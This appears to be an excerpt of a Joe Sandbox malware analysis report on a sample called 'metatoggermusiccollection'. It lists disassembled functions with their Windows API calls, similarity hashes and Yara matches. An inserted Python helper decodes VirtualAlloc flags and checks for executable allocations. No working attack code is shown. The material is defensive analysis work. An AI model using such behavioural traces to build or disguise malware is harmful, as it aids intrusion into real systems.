                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                            • String ID:
                                                                            • API String ID: 2725315915-0
                                                                            • Opcode ID: ee268003ce00d6d7c3effeaee33bea4428fa9550b28ff7b2e36935843922e2eb
                                                                            • Instruction ID: fd8ef4d988aae6c09c1bc835ecd03c1d7c26ae913433aece52903fe9d209a271
                                                                            • Opcode Fuzzy Hash: ee268003ce00d6d7c3effeaee33bea4428fa9550b28ff7b2e36935843922e2eb
                                                                            • Instruction Fuzzy Hash: 9D016DB2A40305AFDB109FE4DC89E86B7ADEF0835AF004914F626D6690DF64E8168B20
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02AD2432
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD2445
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD2454
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2469
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2470
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 747265849-0
                                                                            • Opcode ID: 5ca50511c0f5fcfd653729c39180204911c50e651ef054acaf5ae56ca45b2f07
                                                                            • Instruction ID: 496fef5fad7a3555cb044a5d73fd2a139e57da00608866500009da5ed2a39f3a
                                                                            • Opcode Fuzzy Hash: 5ca50511c0f5fcfd653729c39180204911c50e651ef054acaf5ae56ca45b2f07
                                                                            • Instruction Fuzzy Hash: B5F01D72680214BBD6509FA4ED89FD6B72CFF45711F804411FB02D6881DBA5F921CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02AD1ED2
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02AD1EEA
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD1EF9
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD1F0E
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD1F15
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 830998967-0
                                                                            • Opcode ID: 75626f04c9278d0aab3fee51f646c33c7785d06b926050be0bfde01aaf4d3ee4
                                                                            • Instruction ID: aa21b5d9ba77cbb965080ea03ea8039c9fa48422f0d20753fd1809e1bc741702
                                                                            • Opcode Fuzzy Hash: 75626f04c9278d0aab3fee51f646c33c7785d06b926050be0bfde01aaf4d3ee4
                                                                            • Instruction Fuzzy Hash: 24F01772641605BBD740AFA5ED88FD6BB2DFF04351F000416F70286841DB79EA66CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: invalid string position$string too long
                                                                            • API String ID: 4104443479-4289949731
                                                                            • Opcode ID: e96c415cf68514eaac9a74eddb5ed953261e0d1a17194f1af6555beac26eb95b
                                                                            • Instruction ID: 8d3deb3e9d3a98881198a6bd696067f0d8351ea21a847bb66e0dee0c937cf1bc
                                                                            • Opcode Fuzzy Hash: e96c415cf68514eaac9a74eddb5ed953261e0d1a17194f1af6555beac26eb95b
                                                                            • Instruction Fuzzy Hash: 9141A075300305EFDB248F69D984A6ABBBAEB40724B00092DE957CB781CF74E946CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02AD30C3
                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02AD3102
                                                                            • _memcmp.LIBCMT ref: 02AD3141
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressErrorLastString_memcmp
                                                                            • String ID: 255.255.255.255
                                                                            • API String ID: 1618111833-2422070025
                                                                            • Opcode ID: 15410e691c6e40227df30714182f22504e484f20822fc166d137748688c54283
                                                                            • Instruction ID: fbba9c64462400144da98d791c0e7fcc6106f098d130052ea5d26348417cb32c
                                                                            • Opcode Fuzzy Hash: 15410e691c6e40227df30714182f22504e484f20822fc166d137748688c54283
                                                                            • Instruction Fuzzy Hash: 693197B1900309DFDF209FA4C88076EB7B5BF45314F1045A9E96797280DF71994ACF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD1F5B
                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02AD1FC5
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02AD1FD2
                                                                              • Part of subcall function 02AD1712: __EH_prolog.LIBCMT ref: 02AD1717
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                            • String ID: iocp
                                                                            • API String ID: 998023749-976528080
                                                                            • Opcode ID: dac0d0ab76a7bb68afe6c29b896c0a7a8f48fb1d2cdfc158fe227510872d3e2a
                                                                            • Instruction ID: 3526be533e4d001ccaa5126d49d78c2099123b0309a920952b9a3ae54fdfa16c
                                                                            • Opcode Fuzzy Hash: dac0d0ab76a7bb68afe6c29b896c0a7a8f48fb1d2cdfc158fe227510872d3e2a
                                                                            • Instruction Fuzzy Hash: 1821D5B1901B449BC720DFAAC54055BFBF8FF94720B108A1FE5A683A60DBB4A604CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02AE2EEC: __FF_MSGBANNER.LIBCMT ref: 02AE2F03
                                                                              • Part of subcall function 02AE2EEC: __NMSG_WRITE.LIBCMT ref: 02AE2F0A
                                                                              • Part of subcall function 02AE2EEC: RtlAllocateHeap.NTDLL(00780000,00000000,00000001), ref: 02AE2F2F
                                                                            • std::exception::exception.LIBCMT ref: 02AE3AC5
                                                                            • __CxxThrowException@8.LIBCMT ref: 02AE3ADA
                                                                              • Part of subcall function 02AE449A: RaiseException.KERNEL32(?,?,02ADFA92,?,?,?,?,?,?,?,02ADFA92,?,02B00F78,?), ref: 02AE44EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                            • String ID: bad allocation
                                                                            • API String ID: 3074076210-2104205924
                                                                            • Opcode ID: 30394fa328bd6f580bcc75459a57ba0aa20b398514090673ac76f86a678a574a
                                                                            • Instruction ID: 689ff58387c03f117c7260b43c154a40059f5aedd23c361a1059cd4881ef7b22
                                                                            • Opcode Fuzzy Hash: 30394fa328bd6f580bcc75459a57ba0aa20b398514090673ac76f86a678a574a
                                                                            • Instruction Fuzzy Hash: DBE0E53054020EAADF00FFA0CD04ABFBB7DAF00304F4004D5AD1663590EF369646D990
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD37B6
                                                                            • __localtime64.LIBCMT ref: 02AD37C1
                                                                              • Part of subcall function 02AE2540: __gmtime64_s.LIBCMT ref: 02AE2553
                                                                            • std::exception::exception.LIBCMT ref: 02AD37D9
                                                                              • Part of subcall function 02AE2413: std::exception::_Copy_str.LIBCMT ref: 02AE242C
                                                                              • Part of subcall function 02ADA45B: __EH_prolog.LIBCMT ref: 02ADA460
                                                                              • Part of subcall function 02ADA45B: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02ADA46F
                                                                              • Part of subcall function 02ADA45B: __CxxThrowException@8.LIBCMT ref: 02ADA48E
                                                                            Strings
                                                                            • could not convert calendar time to UTC time, xrefs: 02AD37CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                            • String ID: could not convert calendar time to UTC time
                                                                            • API String ID: 1963798777-2088861013
                                                                            • Opcode ID: 6f47661def6610d5a2134b33928a83614d0ebb2dc4adb0de2b4fa4050180ad6d
                                                                            • Instruction ID: 9ec15a7f7941968e74b2dcf2a0cc8a6ee09e9291897cc1054cc9039057f87745
                                                                            • Opcode Fuzzy Hash: 6f47661def6610d5a2134b33928a83614d0ebb2dc4adb0de2b4fa4050180ad6d
                                                                            • Instruction Fuzzy Hash: 24E06DB1D8060A9ACF00EFD4DA547AEB779EF04300F4045A9E916A2540EF38560A8E95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                            • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                            • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual$FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 714016831-0
                                                                            • Opcode ID: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction ID: 29c7c306398b504596bf767bafbbf3f0594b5aced9f79ae4ff8fd419923c464c
                                                                            • Opcode Fuzzy Hash: 2f654d351822ba0938a426815c3a9789615761df562ee039fb8b9cb046954d4c
                                                                            • Instruction Fuzzy Hash: 6831F071A447019BE3208F24DD45B22BFB8EB44B5AF10813AE566BB3D1E778B9008B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
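The VirtualAlloc/VirtualFree entry above (function at 004032A0 in the 00400000 image) reserves a 4 MiB region with flAllocationType 0x2000 and flProtect 0x04, commits 64 KiB of it with 0x1000/0x04, and releases it with 0x8000. The following is an added helper for reading such listings, not part of the Joe Sandbox report or its plugin: it parses the report's "API.MODULE(args), ref: addr" lines, decodes the documented Windows memory constants, and flags any allocation that requests an executable protection. The five sample lines are copied from the entry above; the extra RWX line is constructed only to show the check firing and does not come from the sample.

```python
import re

# Documented Windows memory constants (winnt.h / memoryapi.h).
ALLOCATION_TYPES = {
    0x00001000: "MEM_COMMIT",
    0x00002000: "MEM_RESERVE",
    0x00080000: "MEM_RESET",
    0x00100000: "MEM_TOP_DOWN",
    0x00400000: "MEM_PHYSICAL",
    0x20000000: "MEM_LARGE_PAGES",
}
FREE_TYPES = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PROTECTION_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}

# Shape of one API line in the report: "Name.MODULE(arg,arg,...), ref: ADDR".
API_LINE = re.compile(r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)")

# Lines copied from the report entry for the function at 004032A0.
REPORT_LINES = [
    "• HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29",
    "• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D",
    "• VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67",
    "• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28",
    "• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F",
]
# Constructed line (not from the sample): commit+reserve with PAGE_EXECUTE_READWRITE.
CONSTRUCTED_RWX_LINE = "• VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040), ref: DEADBEEF"


def parse_api_line(line):
    """Return {'api','module','args','ref'} for one report line, or None if it is not an API line."""
    m = API_LINE.search(line)
    if not m:
        return None
    args = []
    for a in m.group("args").split(","):
        a = a.strip()
        args.append(None if a in ("", "?") else int(a, 16))  # '?' means the sandbox did not resolve the value
    return {"api": m.group("api"), "module": m.group("module"), "args": args, "ref": m.group("ref")}


def decode_bits(value, table):
    """Split a flag word into known constant names plus any leftover bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    known = 0
    for bit in table:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def decode_protect(protect):
    """Return (name, is_executable) for a flProtect value, keeping GUARD/NOCACHE/WRITECOMBINE modifiers."""
    base = protect & 0xFF
    names = [PAGE_PROTECTIONS.get(base, f"0x{base:X}")] + decode_bits(protect & 0x700, PROTECTION_MODIFIERS)
    return "|".join(names), base in EXECUTABLE_PROTECTIONS


def decode_call(rec):
    """Decode VirtualAlloc/VirtualFree argument words; other APIs (HeapAlloc, HeapFree) are left undecoded."""
    api, args = rec["api"], rec["args"]
    if api == "VirtualAlloc" and len(args) >= 4 and None not in args[:4]:
        address, size, alloc_type, protect = args[:4]
        protect_name, executable = decode_protect(protect)
        return {"ref": rec["ref"], "api": api, "address": address, "size": size,
                "alloc_type": decode_bits(alloc_type, ALLOCATION_TYPES),
                "protect": protect_name, "executable": executable}
    if api == "VirtualFree" and len(args) >= 3 and None not in args[:3]:
        address, size, free_type = args[:3]
        return {"ref": rec["ref"], "api": api, "address": address, "size": size,
                "free_type": decode_bits(free_type, FREE_TYPES), "executable": False}
    return None


def summarize(lines):
    """Decode every VirtualAlloc/VirtualFree line in order; non-matching lines are skipped."""
    out = []
    for line in lines:
        rec = parse_api_line(line)
        if rec is None:
            continue
        decoded = decode_call(rec)
        if decoded is not None:
            out.append(decoded)
    return out


def executable_allocations(lines):
    """Refs of VirtualAlloc calls that request an executable page protection (RWX staging check)."""
    return [d["ref"] for d in summarize(lines) if d["executable"]]


if __name__ == "__main__":
    for d in summarize(REPORT_LINES + [CONSTRUCTED_RWX_LINE]):
        print(d)
    print("executable:", executable_allocations(REPORT_LINES + [CONSTRUCTED_RWX_LINE]))
```

For the sample's own lines the executable check returns nothing: both VirtualAlloc calls ask for PAGE_READWRITE, so this function reserves and commits a plain RW arena rather than staging executable code. The constructed line is the only one that trips the check.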

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustPointer_memmove
                                                                            • String ID:
                                                                            • API String ID: 1721217611-0
                                                                            • Opcode ID: 24d65704ef255113032d1efe3de204f8ae5ad15449ebce515c6bff1890b59871
                                                                            • Instruction ID: 68c94dd4822037b06924c46f6f545e3a02b97310ff1dfda3cf721a1cb96bbe07
                                                                            • Opcode Fuzzy Hash: 24d65704ef255113032d1efe3de204f8ae5ad15449ebce515c6bff1890b59871
                                                                            • Instruction Fuzzy Hash: 2141A0762443439AEF289F64D884F7A73A79F01334F24441FE94B8A1E1EF65E982CA11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE12FF
                                                                              • Part of subcall function 02AD3FDC: __EH_prolog.LIBCMT ref: 02AD3FE1
                                                                              • Part of subcall function 02AD3FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02AD3FF3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AE12F4
                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE1340
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02AD4149), ref: 02AE1411
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                            • String ID:
                                                                            • API String ID: 2825413587-0
                                                                            • Opcode ID: ee3d694d157bd3230508e8040fbecc7cd47dc3bd46f7e3484b47b313321f578c
                                                                            • Instruction ID: 87f6b907ec00bc7c0dbf6a59d509625cb09d64e27cd151a254e15f5be78f40fd
                                                                            • Opcode Fuzzy Hash: ee3d694d157bd3230508e8040fbecc7cd47dc3bd46f7e3484b47b313321f578c
                                                                            • Instruction Fuzzy Hash: 1951AEB16003168BDF11DF28C884B9AB7E5AF48328F150668E86E97390DF35DC06CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            • Opcode ID: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction ID: 77b72f3c8ba06149445a9c60bcaa0fb4642eb414219ac411a74824b41e73b4bc
                                                                            • Opcode Fuzzy Hash: 4b00bb2f2e8909ad1b25914f564552747ffa73792e7b52f6c639d3ed484d2925
                                                                            • Instruction Fuzzy Hash: F941A0B5A00706EBDF18CF69C8D15BE77A6AF44364B1482ADE85787280EF71D942CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02AEFE8B
                                                                            • __isleadbyte_l.LIBCMT ref: 02AEFEB9
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02AEFEE7
                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02AEFF1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                            • String ID:
                                                                            • API String ID: 3058430110-0
                                                                            • Opcode ID: 1a789f2ccdc93dc6182c2e667dd4843a07b9bc4794680ace066e4e8366a2a11f
                                                                            • Instruction ID: 17fb67cc1d663ffb52ec3b55068d25ddfa106b4c5d8d0cc6e5050b75cb820993
                                                                            • Opcode Fuzzy Hash: 1a789f2ccdc93dc6182c2e667dd4843a07b9bc4794680ace066e4e8366a2a11f
                                                                            • Instruction Fuzzy Hash: 0931E131600246AFDF219F79CC84BAA7BB9FF41314F154069E81AC79A1EB30E852CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • htons.WS2_32(?), ref: 02AD3DA2
                                                                              • Part of subcall function 02AD3BD3: __EH_prolog.LIBCMT ref: 02AD3BD8
                                                                              • Part of subcall function 02AD3BD3: std::bad_exception::bad_exception.LIBCMT ref: 02AD3BED
                                                                            • htonl.WS2_32(00000000), ref: 02AD3DB9
                                                                            • htonl.WS2_32(00000000), ref: 02AD3DC0
                                                                            • htons.WS2_32(?), ref: 02AD3DD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                            • String ID:
                                                                            • API String ID: 3882411702-0
                                                                            • Opcode ID: 8c0e368111d66e22b224f9197cd6ccfbdeda42b62df203bf08661ba22a66af6e
                                                                            • Instruction ID: 233b316df086e187e98ab655d168c96c75c61ecdef6a7662ba9ef4efcf62983b
                                                                            • Opcode Fuzzy Hash: 8c0e368111d66e22b224f9197cd6ccfbdeda42b62df203bf08661ba22a66af6e
                                                                            • Instruction Fuzzy Hash: 37118235900309EFCF019FA4D985AAAB7B9EF09310F008496FD05DF215EA71DA19CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02AD23D0
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD23DE
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD2401
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD2408
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: 5193d626149907782b5a0f603a3712dbb9e070923ed9fdf51b16a94f5bdbd036
                                                                            • Instruction ID: fa928e1101214d55937d0f983a2abf6bf587ca7e1eaa0965730ad9abe3029def
                                                                            • Opcode Fuzzy Hash: 5193d626149907782b5a0f603a3712dbb9e070923ed9fdf51b16a94f5bdbd036
                                                                            • Instruction Fuzzy Hash: 6E11CE71600304ABDB109FA0CD84BA6BBB9FF40704F1044ADEA029B541EBB5F912CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                            • String ID:
                                                                            • API String ID: 3016257755-0
                                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction ID: bb5b86f82ca3d8b98a564dd8a8df8822a9c36fd24298fe90e22c3b91798721fb
                                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                            • Instruction Fuzzy Hash: 0D010D7244014AFBCF126F84DD82CEE3F67BB18364B488416FA1A59131DB36C5B2AB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02AD24A9
                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02AD24B8
                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02AD24CD
                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02AD24D4
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                            • String ID:
                                                                            • API String ID: 4018804020-0
                                                                            • Opcode ID: b0d48f422c510c95574c54cfcd4a2d4c60494ee6a6d48701aba998bf12aa8db8
                                                                            • Instruction ID: 708ff19d1aa99526c1106d1c11d2a8be71273ea98589b102b96f6842c3a266d3
                                                                            • Opcode Fuzzy Hash: b0d48f422c510c95574c54cfcd4a2d4c60494ee6a6d48701aba998bf12aa8db8
                                                                            • Instruction Fuzzy Hash: 25F01972540205AFDB40AFA9EC84F9ABBA8FF45710F004419FA05D6541DB75E561CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD2009
                                                                            • RtlDeleteCriticalSection.NTDLL(?), ref: 02AD2028
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD2037
                                                                            • CloseHandle.KERNEL32(00000000), ref: 02AD204E
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                            • String ID:
                                                                            • API String ID: 2456309408-0
                                                                            • Opcode ID: 30e22c63ac09cad37f5e5416df5046790aad07c6d024833cd2de121233846319
                                                                            • Instruction ID: 5fe3b11d4f47d2010f4d106d98e356a5f35b82ced203c375deb4ab72e1f80847
                                                                            • Opcode Fuzzy Hash: 30e22c63ac09cad37f5e5416df5046790aad07c6d024833cd2de121233846319
                                                                            • Instruction Fuzzy Hash: 5801AD718007048FC728AF94E9087AABBB4FF04709F00495DFA8682990CF79A949CF54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event$H_prologSleep
                                                                            • String ID:
